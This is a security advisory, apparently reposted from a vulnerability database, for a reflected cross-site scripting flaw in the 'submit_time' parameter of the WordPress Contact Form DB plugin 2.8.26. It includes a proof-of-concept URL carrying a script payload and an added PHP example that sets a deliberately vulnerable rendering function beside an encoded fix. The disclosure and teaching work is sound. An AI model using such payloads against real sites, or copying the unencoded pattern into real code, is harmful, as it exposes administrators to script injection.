WordPress Contact Form DB 2.8.26 Cross Site Scripting

2015.02.10
Credit: Morten
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Title: WordPress 'Contact Form DB' plugin - XSS
Version: 2.8.26
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/01/26
Download: https://wordpress.org/plugins/contact-form-7-to-database-extension/
Contacted WordPress: 2015/01/26

==========================================================
## Description:
==========================================================
Saves submitted form data to the database. Export the data to a file or use short codes to display it.

==========================================================
## Reflected XSS:
==========================================================
The 'submit_time' parameter is not properly sanitized before being used.

PoC: Log in as admin and visit the following URL:

http://[URL]/wp-admin/admin.php?page=CF7DBPluginSubmissions&submit_time=%22/%3E%3Cscript%3Ealert%28101%29%3C/script%3E

==========================================================
## Solution
==========================================================
Update to newest version.
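The advisory's payload works because the filter value is written back into an HTML attribute without encoding, so the leading `"` closes the attribute and `/>` closes the tag. The following is an added illustration, not the plugin's source: the function names, the hidden-field markup and the use of plain PHP instead of WordPress helpers are assumptions; it contrasts raw interpolation with attribute-context encoding on the decoded PoC value.

```php
<?php
// Added example (not Contact Form DB's code). A request parameter is echoed
// back inside an HTML attribute, here a hidden field that round-trips the
// 'submit_time' filter. Names and markup are assumptions for illustration.

// Vulnerable pattern: raw interpolation into an attribute value.
function render_filter_unsafe(string $submit_time): string {
    return '<input type="hidden" name="submit_time" value="' . $submit_time . '" />';
}

// Hardened: encode for the attribute context. ENT_QUOTES also encodes the
// double quote, which is the character that lets the PoC close the attribute.
// Inside WordPress the equivalent helper is esc_attr().
function render_filter_safe(string $submit_time): string {
    return '<input type="hidden" name="submit_time" value="'
        . htmlspecialchars($submit_time, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . '" />';
}

// Constructed input: the advisory's PoC value after URL decoding.
$poc = rawurldecode('%22/%3E%3Cscript%3Ealert%28101%29%3C/script%3E');

$unsafe = render_filter_unsafe($poc);
$safe   = render_filter_safe($poc);

// The unsafe rendering contains a live <script> element; the safe one does not,
// and the value survives intact once the browser decodes the entities.
assert(strpos($unsafe, '<script>') !== false);
assert(strpos($safe, '<script') === false);
assert(html_entity_decode(
    substr($safe, strlen('<input type="hidden" name="submit_time" value="'), -strlen('" />')),
    ENT_QUOTES | ENT_HTML5, 'UTF-8') === $poc);

echo $unsafe, PHP_EOL;
echo $safe, PHP_EOL;
```

Because the vulnerable page sits under `wp-admin` and the PoC requires an authenticated administrator, exposure depends on an admin being lured to the crafted URL, which is consistent with the advisory's Low risk rating.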

References:

https://wordpress.org/plugins/contact-form-7-to-database-extension/

Copyright 2024, cxsecurity.com